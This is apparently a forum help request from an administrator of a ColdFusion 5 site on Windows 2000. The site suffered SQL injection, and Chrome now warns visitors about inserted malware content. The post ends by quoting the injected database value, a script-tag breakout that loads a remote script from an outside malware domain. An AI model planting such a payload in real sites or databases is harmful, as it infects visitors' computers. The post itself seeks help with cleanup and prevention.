We have a Coldfusion site that has been attacked. It is on a windows 2000 server running coldfusion 5 and I need to know how to find and get rid of the malicious code. I have changed the cfquery tag to include cfqueryparam but that has not helped. Currently users are periodically getting this error:
Danger: Malware Ahead!
Google Chrome has blocked access to this page on www.ourweburl.net
Content from hgbyju.com, a known malware distributor, has been inserted into this web page. Visiting this page now is very likely to infect your computer with malware.
I cannot locate any tools that will run on the server and malwarebytes did not find anything. Any assistance would be greatly appreciated.
I just found where the malicious code was placed in our table and removed it but how do I prevent it from returning? Here is what had been entered into one of the columns on multiple records.
></script> </title><script src=http://nmmkmm.com/r.php